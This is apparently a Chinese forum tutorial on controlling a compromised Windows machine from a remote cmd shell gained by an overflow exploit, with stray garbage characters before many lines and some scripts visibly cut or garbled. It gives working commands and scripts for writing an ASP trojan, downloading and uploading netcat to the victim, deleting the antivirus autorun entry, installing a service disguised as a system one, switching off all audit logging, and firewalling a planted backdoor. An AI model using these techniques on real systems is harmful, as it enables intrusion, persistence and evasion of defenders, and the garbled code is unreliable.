命令行交互

韩冰

目录
2 p8 G' r1 ]$ K& T3 }1，前言
2，文件传输
3 ~( E# J" n/ _' Z# w3，系统配置
! \1 @4 K! d' K, V( j0 I2 v9 r4，网络配置
5，软件安装
6，Windows脚本
4 j! b+ {( h, j- }9 P7，附言
) ^9 H' s' X/ H% J" p

2 }, @& ^9 r0 J5 v前言
Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
  G# S4 Y0 i* X- H5 t. Z

% j. ]6 X. C- V文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：
0 p! i- f0 }- d$ {7 L
1，用Echo命令写ASP木马。
% p/ l1 r' O% Y- O* U# i: ?前提当然是目标主机上已经安装了IIS。
' @* T5 @/ Y6 g% z, p5 L3 B一般的ASP木马“体积”较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

' y  ~5 }) c: A2 `0 M5 X' \* A2 W@echo ^ >up.asp

7 T# R- B+ s! h( \" k) q) U注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只能用下面这个脚本：

# Q% z& Y. F1 P" R$ K7 _with wscript
' H1 X7 W4 C' p9 \7 y3 m( ~if .arguments.count>dl.vbs
+ p3 @. {$ [- N. ^@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
. u9 n" }4 k) X# ~@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs
' @. Z* W( u1 O
% E) f8 q/ n( g% Q& F举例——下载ps.exe并保存到c:\path下：
* a7 b* ^/ n0 r# t0 o
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

注意，这是在远程shell中执行的。
' Q/ S' U6 J5 a
- k% Z# ]5 ?+ Z. ^; i4，Echo经过编码的任何文件，再用脚本+debug还原。
前面两个办法都不能保证穿过防火墙。而且，除非自己架Web服务器，一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具，还是没辙。那么只有出“杀手锏”了！

echo命令加重定向x作符可以写入ASCII码小于128的字符，但大于等于128的不行。只有将本地文件重新“编码”为可显示的字符，才能方便地写入远程主机。首先能想到的就是base64编码，即email附件的编码方式。但vbs不支持位x作，因此编码和解码较复杂。更麻烦的是，脚本以二进制流方式处理文件的能力很差。（ADODB.Stream可以以流方式写文件，但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串，但反过来不行。我花了两天时间，还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中，恳请赐教。）
8 d$ Y3 M' c3 e* t. z
1 G( ^* I6 ]. `# w  y9 i4 N5 n3 _% \无奈只有请debug.exe出马了。原理很多人都知道，我不介绍了，直接给出成果——编码脚本：
* s+ d) Q% r) E: X! f
' u* j. _5 ^6 f+ X9 [fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
5 e, k! w) G3 P. i+ cwith createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
# D9 J+ [( ^2 J  }% K% m( C. K- b: vend with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
. d, [; S; c' \/ b5 T- b9 o.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
* ]. ~- q$ j1 q8 a  V; ]3 h3 }.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
6 a- }5 }' e( x  k4 B9 K+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with

将其保存为echo.vbs。假设要上传nc.exe，那么在本地命令行输入命令：

3 C9 F/ P  B1 S( F" M+ _cscript echo.vbs nc.exe

5 z4 N0 _8 r9 h6 C0 c3 K- f也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿，在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它，可以看到如下内容：
; `7 [  M( z. c9 D' a
$ n5 d! m; V+ Z% Z; Z@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"_>>debug.vbs
; J0 T: ]; E1 Q' ~+ Q3 }- `7 s@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
6 e/ |  `) X1 \. u/ {# F, Q, ?@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
…………
* M9 B- @0 U0 N$ d3 z  n& E…………（省略若干行）
…………
@echo +"">>debug.vbs
1 r, h1 C$ r8 C* R. ^5 D6 v@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs

全选 －》 复制 －》 切换到远程命令行窗口 －》 粘贴。
* e6 u3 C( B+ t/ o0 c/ B# R如果网速不是很慢的话，整个上传过程大约需要20秒。
( k( J6 C2 d$ v0 B! Q* x! E1 o9 u& o
! S' y7 t2 t7 u  }& f. e1 W/ m8 j几点说明：
; X( [8 C5 G' X) ]6 f8 l1，大的文件传输不稳定，可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。
& I2 S  F% P* l4 _. z2 k$ a. Y4 N# i2，在传输大文件前，可以先传个小的文件作为“热身”，让16位虚拟机ntvdm.exe驻留后台。所有文件传完后，为隐蔽起见，应该把ntvdm进程杀掉。
3，某些cmd shell每个命令都需要附加两个回车，那nc.exe.bat就不能直接用了。
3 K9 x7 ~* n; l/ p" q" x: U  N$ n/ D4，单个命令的长度是有限的，所以不能只用一个echo完成全部任务。而且，对于nc提供的cmd shell，稍长一些的命令竟然会使shell自动退出（溢出了？）。你可以修改"i mod 128=0"语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。
9 D( R! U1 `/ C5，解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量（因为压缩了数据）。如果有时间，我会写一个更完善的脚本，加强数据压缩能力，增加数据校验功能。
3 z$ ]! N: X5 f$ k4 p5 e' @
+ Y# `4 d1 E) f) D  V' J能上传文件当然一切都好办了，但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时，不要忘了Windows本身。

韩冰

系统配置
这节包括三方面内容：注册表、服务和组策略。

先说注册表。很多命令行下访问注册表的工具都是交互式的，溢出产生的shell一般不能再次重定向输入/输出流，所以无法使用。
好在系统自带的regedit.exe足够用了。

1，读取注册表
/ H. e1 l  P! Z' S( D) l先将想查询的注册表项导出，再用type查看，比如：

C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
+ i4 q4 b) k0 |
C:\>type 1.reg | find "ortNumber"
"ortNumber"=dword:00000d3d

C:\>del 1.reg
  Q% d- g( n% n* ^
! x4 M% }) g/ W8 I所以终端服务的端口是3389（十六进制d3d）

2，修改/删除注册表项
先echo一个reg文件，然后导入，比如：
$ u% j/ X/ d# H; _+ D8 Z. I
echo Windows Registry Editor Version 5.00 >1.reg
6 u& T+ u4 D8 v6 W7 @. Oecho. >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo "TelnetPort"=dword:00000913 >>1.reg
echo "NTLM"=dword:00000001 >>1.reg
2 W( p$ d8 A9 [0 F4 w2 B5 Secho. >>1.reg
regedit /s 1.reg

将telnet服务端口改为2323（十六进制913），NTLM认证方式为1。

; A9 H/ |  C8 m/ U! T+ e4 _要删除一个项，在名字前面加减号，比如：

, i; q9 H. `9 v+ z4 {# I[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

2 ^1 w2 Q/ H1 S  e# W6 p7 h; w要删除一个值，在等号后面用减号，比如：
: A: r) d& E+ S. N- h& a
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-
7 W3 h  X/ ?  D: n7 {( k2 A
3，用inf文件访问注册表
5 b& n& Y8 G9 R+ q) Z* [$ ]% ~$ p  i; L上面对注册表的三个x作，也可以用下面这个inf文件来实现：

) h" v- q- I: R3 s[Version]
8 h' D5 g+ n; z; _2 \6 k- i7 oSignature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
4 F2 |) J) J8 B# y[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
# r' }( ]$ B1 X3 j! M9 bHKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
) U# F7 O* l1 o# g3 vHKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
) B9 }2 [+ E/ x" W
2 k8 I( k! L/ a" v4 K2 K将它写入c:\path\reg.inf然后用下面这个命令“安装”：
# j# u( m7 _8 G$ r: \0 n
( y( s- I  q  K  trundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf
4 z! A0 \+ F6 Y* r3 v; m- _
) y$ [! y% {% O1 ~2 K/ Q* O几点说明：
7 Z5 A+ `8 T7 I' W- c# m3 f1，[Version]和[DefaultInstall]是必须的，AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0x00010001表示REG_DWORD数据类型，0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。
8 g! w; e, o& x# q2 P2323也可以用0x913代替。
关于inf文件的详细信息，可以参考DDK帮助文档。
2，InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号，没有空格。
128表示给定路径，该参数其他取值及含义参见MSDN。
特别注意，最后一个参数，必须是inf文件的全路径，不要用相对路径。
' G5 K! d" S: Q5 A! F3 f- O3，inf文件中的项目都是大小写不敏感的。

6 e" s5 T' Y) ]: R9 w: r  L! b; f. p% Y
接下来说服务。如果想启动或停止服务，用net命令就可以。但想增加或删除服务，需要用SC，instsrv.exe，xnet.exe等工具。而这些工具系统没有自带（XP和2003自带SC)。导入注册表虽然可以，但效果不好，原因后面会提到。还是得靠inf文件出马。
9 z* e0 J8 E) Q" c5 H
4 @/ x3 K, G5 }- `, M& F增加一个服务：
3 N8 f& |- }. E+ a2 u! g. o5 [" b
[Version]
8 {8 G, y5 ~) C4 ?, L& zSignature="$WINDOWS NT$"
- F0 N* F" w5 j+ b8 l. B4 ?" y[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
$ g$ I, A/ V: [6 R0 e. i8 @[My_AddService_Name]
& k) M3 j) c, z7 s' l" dDisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
* E  T8 ~6 S2 j. m+ BStartType=2
; e+ @. Q- T( L1 q1 ?2 jErrorControl=0
ServiceBinary=%11%\inetsvr.exe

* w* L  T* W9 L( Q保存为inetsvr.inf，然后：

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf

这个例子增加一个名为inetsvr的服务（是不是很像系统自带的服务，呵呵）。
0 r0 p0 p/ v/ P
( P. X7 R+ \3 W$ ^3 W6 q- W几点说明：
1 |" ~2 z( w$ [$ N# ?1，最后四项分别是
  |+ f, l& I! H. D. I( l; B服务类型：0x10为独立进程服务，0x20为共享进程服务（比如svchost）；
启动类型：0 系统引导时加载，1 OS初始化时加载，2 由SCM（服务控制管理器）自动启动，3 手动启动，4 禁用。
（注意，0和1只能用于驱动程序）
错误控制：0 忽略，1 继续并警告，2 切换到LastKnownGood的设置，3 蓝屏。
服务程序位置：%11%表示system32目录，%10%表示系统目录(WINNT或Windows)，%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量，直接使用全路径。
这四项是必须要有的。
2，除例子中的六个项目，还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。
3，inetsvr后面有两个逗号，因为中间省略了一个不常用的参数flags。

删除一个服务：

9 X4 O; {" |* q0 Z% Q6 C[Version]
" |  S1 J6 t4 q5 C, \' R  pSignature="$WINDOWS NT$"
8 s5 y  w. s5 h+ Y, E: ?[DefaultInstall.Services]
+ a4 s; i$ H4 |1 Y  xDelService=inetsvr
% s1 O  |$ W3 x- M9 @$ a
2 e8 I) _. ^0 N9 q$ t0 J7 o2 c很简单，不是吗？
# T8 Y' ?' J  z9 @" g/ G$ u
当然，你也可以通过导入注册表达到目的。但inf自有其优势。
8 V  @% t1 ]% ?: c/ S1，导出一个系统自带服务的注册表项，你会发现其执行路径是这样的：
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
. ?: o2 i; x2 c5 V/ B" q6 }74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
* A9 v9 w; N, \# R7 |+ V可读性太差。其实它就是%SystemRoot%\system32\tlntsvr.exe，但数据类型是REG_EXPAND_SZ。当手动导入注册表以增加服务时，这样定义ImagePath显然很不方便。如果用REG_SZ代替会有些问题——不能用环境变量了。即只能使用完整路径。用inf文件完全没有这个问题，ServiceBinary（即ImagePath）自动成为REG_EXPAND_SZ。
2 E0 P2 n7 h  f7 b0 \% z2，最关键的是，和用SC等工具一样，inf文件的效果是即时起效的，而导入reg后必须重启才有效。
( }# d* |7 x7 W: i) Y3，inf文件会自动为服务的注册表项添加一个Security子键，使它看起来更像系统自带的服务。

韩冰

另外，AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。
. F) R5 Q3 A2 P+ z; V! c. ]
. O8 A! p( h5 u: H6 R) c
最后说说组策略。组策略是建立Windows安全环境的重要手段，尤其是在Windows域环境下。一个出色的系统管理员，应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc，命令行下用secedit.exe。
6 C9 ]4 W8 A; n( X* L/ ^
" ~1 x! U0 D; @1 h先看secedit命令语法：
secedit /analyze
) g  {( `4 `6 I- W2 tsecedit /configure
* E- m5 R' W" H, c( @& h& vsecedit /export
! U5 X( c' Q; Ssecedit /validate
! w# @& p+ I( ~) rsecedit /refreshpolicy
' ^0 u" C3 u2 B1 q) B5 ^, L5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。

) J: {% n4 D9 E% u: I/ i; G& Q3 J与访问注册表只需reg文件不同的是，访问组策略除了要有个模板文件(还是inf)，还需要一个安全数据库文件(sdb)。要修改组策略，必须先将模板导入安全数据库，再通过应用安全数据库来刷新组策略。来看个例子：

假设我要将密码长度最小值设置为6，并启用“密码必须符合复杂性要求”，那么先写这么一个模板：

[version]
signature="$CHICAGO$"
0 N" ^6 `2 N3 }* E, d" D[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
7 H( ?: {" g) C; U& M6 N
2 a* o  F( L) b# h) N' u$ V5 y保存为gp.inf，然后导入：

secedit /configure /db gp.sdb /cfg gp.inf /quiet
9 f+ M- p. c7 _8 A* i& Y# U8 E
8 U: g( E- |6 K" E3 c4 ~这个命令执行完成后，将在当前目录产生一个gp.sdb，它是“中间产品”，你可以删除它。
$ v9 `% w& i, C8 p0 L* J& L/ u/quiet参数表示“安静模式”，不产生日志。但根据我的试验，在2000sp4下该参数似乎不起作用，XP下正常。日志总是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日志以便随后删除它。比如：
7 R# V1 K$ C7 `7 }  u5 m; b! A
7 i  I0 }5 Z" v; V1 j* Y, b. Nsecedit /configure /db gp.sdb /cfg gp.inf /log gp.log
del gp.*
+ c6 W( v1 Y+ C
另外，在导入模板前，还可以先分析语法是否正确：

secedit /validate gp.inf

那么，如何知道具体的语法呢？当然到MSDN里找啦。也有偷懒的办法，因为系统自带了一些安全模板，在%windir%\security\templates目录下。打开这些模板，基本上包含了常用的安全设置语法，一看就懂。

4 X/ r8 c9 T5 i7 i: r* e7 O8 j再举个例子——关闭所有的“审核策略”。（它所审核的事件将记录在事件查看器的“安全性”里）。
- B  |1 {0 Z6 b) Aecho版：
) U  e' s2 t  s
echo [version] >1.inf
, G! L$ {$ ^4 ?4 B6 [: B  Hecho signature="$CHICAGO$" >>1.inf
  `* @: m, z- b) G7 I2 uecho [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
  J& ~3 K& ^! N+ I- L7 N$ secho AuditPrivilegeUse=0 >>1.inf
6 j5 z9 t: m# o8 t( Q7 j- u. `5 {8 xecho AuditPolicyChange=0 >>1.inf
0 A1 J! e$ h2 y$ Pecho AuditAccountManage=0 >>1.inf
3 _% I- {0 K7 H2 \- gecho AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
6 t( p1 I+ X( E/ _: ]echo AuditAccountLogon=0 >>1.inf
/ K% m+ ?( d0 D6 T- P- gecho AuditLogonEvents=0 >>1.inf
. l6 @4 j' x4 @; r- I* jsecedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
" o. l! [/ t$ q) U" f" n2 Tdel 1.*
+ y8 n; I# F. K
$ |5 `( M2 U- m/ p# b也许有人会说：组策略不是保存在注册表中吗，为什么不直接修改注册表？因为不是所有的组策略都保存在注册表中。比如“审核策略”就不是。你可以用regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有“管理模板”这一部分是完全基于注册表的。而且，知道了具体位置，用哪个方法都不复杂。
0 o4 _! }- s4 N: \( n0 Q1 t
比如，XP和2003的“本地策略”－》“安全选项”增加了一个“本地帐户的共享和安全模式”策略。XP下默认的设置是“仅来宾”。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为“经典”：
5 U! m% c5 x6 a1 g6 x+ E
echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
& a  ^3 X  z3 ]/ j# @regedit /s 1.reg
del 1.reg
" U/ q( l2 ^8 Z( ?6 u
而相应的用inf，应该是：
! {+ n" E. v7 X0 I2 H
echo [version] >1.inf
6 s: ]. Z/ N5 Q& c% N% k% e' \6 O- o! \echo signature="$CHICAGO$" >>1.inf
, s' f& j4 y+ b* jecho [Registry Values] >>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
: T" ^: ^$ Q' Q: f3 Csecedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*

关于命令行下读取组策略的问题。
6 N( o+ a" f' T( h1 Z系统默认的安全数据库位于%windir%\security\database\secedit.sdb，将它导出至inf文件：

secedit /export /cfg gp.inf /log 1.log

7 w) L6 M  }8 `  u  b: T9 {. j没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。

不过，这样得到的只是组策略的一部分（即“Windows设置”）。而且，某个策略如果未配置，是不会被导出的。比如“重命名系统管理员帐户”，只有被定义了才会在inf文件中出现NewAdministratorName="xxx"。对于无法导出的其他的组策略只有通过访问注册表来获得了。

9 L! C0 S" g; |/ ~此办法在XP和2003下无效——可以导出但内容基本是空的。原因不明。根据官方的资料，XP和2003显示组策略用RSoP（组策略结果集）。相应的命令行工具是gpresult。但是，它获得的是在系统启动时被附加（来自域）的组策略，单机测试结果还是“空”。所以，如果想知道某些组策略是否被设置，只有先写一个inf，再用secedit /analyze，然后查看日志了。


# K) \, T, N: Z/ Z& w) Z: z5 O! s网络配置
& I9 a0 e8 f% c3 [" j( h, rWindows自带的关于网络的命令行工具很多，比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat，还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh……
这些命令又可分成三类：网络检测（如ping）、网络连接（如telnet）和网络配置（如netsh）。前面两种相对简单，本文只介绍两个网络配置工具。

netsh
! J( e8 z& E) b3 a# d1 n$ [0 d! b在远程shell中使用netsh首先要解决一个交互方式的问题。前面说过，很多shell不能再次重定向输出输出，所以不能在这种环境下交互地使用ftp等命令行工具。解决的办法是，一般交互式的工具都允许使用脚本（或者叫应答文件）。比如ftp -s:filename。netsh也是这样：netsh -f filename。

韩冰

netsh命令的功能非常多，可以配置IAS、DHCP、RAS、WINS、NAT服务器，TCP/IP协议，IPX协议，路由等。我们不是管理员，一般没必要了解这么多，只需用netsh来了解目标主机的网络配置信息。
" K- U$ u2 Y0 k$ s7 c8 ?
0 p& {) i2 D( O+ m: E1，TCP/IP配置
6 |+ t7 l4 r# l* l) I. p/ r
echo interface ip >s
) |# E# q2 p& U; K# \echo show config >>s
# x4 b- D2 A2 [/ e2 F* G& L: xnetsh -f s
del s

由此你可以了解该主机有多个网卡和IP，是否是动态分配IP(DHCP)，内网IP是多少（如果有的话）。
% r5 t; F' y6 i5 q. Y6 S+ E这个命令和ipconfig /all差不多。

注意，以下命令需要目标主机启动remoteaccess服务。如果它被禁用，请先通过导入注册表解禁，然后
net start remoteaccess

2，ARP
* K' t% A& P' y9 ?9 k7 c
8 A8 Q- }  V, t4 Iecho interface ip >s
echo show ipnet >>s
* g% k  f& e; |+ G- n3 qnetsh -f s
' G; K2 X  V+ R: G# \) r  Ndel s

这个比arp -a命令多一点信息。

) J7 a% A: c8 s& r9 U9 v3，TCP/UDP连接
; c4 E  Y1 n* m
* r7 t" y8 G/ F3 m7 U' @echo interface ip >s
echo show tcpconn >>s
+ s! n2 \% A# u% Uecho show udpconn >>s
: O& m% j) u+ H/ O/ lnetsh -f s
del s
) W4 e8 k5 R! ]' `1 e1 j; d
这组命令和netstat -an一样。
6 d( m& m  j+ c1 C1 @& O
6 E+ A% I/ L/ R7 }5 b4，网卡信息
) O' W6 @" R/ h4 f4 h如果netsh命令都有其他命令可代替，那它还有什么存在的必要呢？下面这个就找不到代替的了。
& m. z3 d$ ?3 ^! v. c; A) ?% E
echo interface ip >s
echo show interface >>s
netsh -f s
# T; z$ B3 E  V: s' f4 O* Bdel s
netsh的其他功能，比如修改IP，一般没有必要使用（万一改了IP后连不上，就“叫天不应叫地不灵”了），所以全部略过。
4 R0 x" {1 R- e
IPSec
首先需要指出的是，IPSec和TCP/IP筛选是不同的东西，大家不要混淆了。TCP/IP筛选的功能十分有限，远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。
7 Y/ K3 p  b9 I" M9 j) \& W- \7 z& k
XP系统用ipseccmd，2000下用ipsecpol。遗憾的是，它们都不是系统自带的。ipseccmd在xp系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中，ipsecpol在2000 Resource Kit里。而且，要使用ipsecpol还必须带上另外两个文件：ipsecutil.dll和text2pol.dll。三个文件一共119KB。

IPSec可以通过组策略来控制，但我找遍MSDN，也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以，组策略这条路走不通。IPSec的设置保存在注册表中(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local)，理论上可以通过修改注册表来配置IPSec。但很多信息以二进制形式存放，读取和修改都很困难。相比之下，上传命令行工具更方便。
. v% u1 c7 c" `* \; v& N! f: c
关于ipsecpol和ipseccmd的资料，网上可以找到很多，因此本文就不细说了，只是列举一些实用的例子。
在设置IPSec策略方面，ipseccmd命令的语法和ipsecpol几乎完全一样，所以只以ipsecpol为例：

: b9 c9 K$ Y4 b- B6 e) A! k& o. c1，防御rpc-dcom攻击
- U8 g0 v3 ^8 ^8 t# W4 I. c
ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x
3 Z' a) |0 G  g  o0 @: x5 v8 q" @
这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。
具体含义如下：
) V) p7 a+ h+ X) x8 K5 u5 Y& f-p myfirewall 指定策略名为myfirewall
-r rpc-dcom 指定规则名为rpc-dcom
-f …… 建立7个筛选器。*表示任何地址(源)；0表示本机地址(目标)；+表示镜像(双向)筛选。详细语法见ipsecpol -?
-n BLOCK 指定筛选x作是“阻塞”。注意，BLOCK必须是大写。
-w reg 将配置写入注册表，重启后仍有效。
1 @) `- q5 e3 R% O0 c( s-x 立刻激活该策略。

2，防止被ping
  S' a  H8 d. n) S# s9 u
ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x
. Q; N5 T# V; d, i; ], S8 w
4 x( G$ |8 Q. e如果名为myfirewall的策略已存在，则antiping规则将添加至其中。
6 f6 ?) M2 t, M/ c" Y2 D注意，该规则同时也阻止了该主机ping别人。
, B: p, y( ?6 i. ]1 q# D' c
9 p- J9 s7 B: A7 L3，对后门进行IP限制
假设你在某主机上安装了DameWare Mini Remote Control。为了保护它不被别人暴破密码或溢出，应该限制对其服务端口6129的访问。

) {* k+ ~* U9 H. y& A! e# Bipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x
4 ^! s" b9 b- V4 P( c
这样就只有123.45.67.89可以访问该主机的6129端口了。
3 t5 {, Q, x  Q0 y5 q. K  b如果你是动态IP，应该根据IP分配的范围设置规则。比如：
* r7 Q" S/ Z9 B4 A
1 D0 g- o, \3 nipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
  w) S* _% B: H1 ?/ Ripsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x
$ X. R! {; r5 t( u2 z' r. e8 X  P
' c: _: G7 c' |0 z- _0 J# W1 j这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。

在写规则的时候，应该特别小心，不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样，可以先用计划任务“留下后路”。例如：
" ~" ~+ N' [# T( y
: ]9 T. Z/ d9 {1 v' g$ e. R( A; uc:\>net start schedule
Task Scheduler 服务正在启动 ..
Task Scheduler 服务已经启动成功。
5 [$ k* ~/ H+ q4 V  v# B+ R3 Z. c
c:\>time /t
; B$ B  @: {4 F; F) p' J12:34

c:\>at 12:39 ipsecpol -p myfw -y -w reg
新加了一项作业，其作业 ID = 1
! t, e7 {2 `2 b' p9 O& a
) o0 N' J# o) F3 U$ Z: Z8 K# T然后，你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。
如果测试结果不理想，就删除该策略。

c:\>ipsecpol -p myfw -o -w reg
4 p; u: T; c) Z$ M% v$ _
注意，删除策略前必须先确保它已停止。不停止它的话，即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间，默认是180分钟。
. Q0 o" I+ d( g7 N
$ N8 O$ z4 F- r  z如果测试通过，那么就启用它。

1 B' q4 Y$ `; j( w' g5 V0 mc:\>ipsecpol -p myfw -x -w reg

  ~6 M' j# n! R$ k$ g7 p6 r( e最后说一下查看IPSec策略的办法。
对于XP很简单，一条命令搞定——ipseccmd show filters
而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中。（已经上传了三个文件，也就不在乎多一个了。^_^）
- c9 T. v; b' t% W$ x
netdiag需要RemoteRegistry服务的支持。所以先启动该服务：
; @6 b7 J# i: [2 ?$ v+ W* ]8 J  C; S# l
: M$ l( p. o6 t$ ?* s3 \net start remoteregistry
- F. Z9 F, i/ t0 e) p
不启动RemoteRegistry就会得到一个错误：

[FATAL] Failed to get system information of this machine.

netdiag这个工具功能十分强大，与网络有关的信息都可以获取！不过，输出的信息有时过于详细，超过命令行控制台cmd.exe的输出缓存，而不是每个远程cmd shell都可以用more命令来分页的。

& g9 B0 A+ ^: C  |查看ipsec策略的命令是：
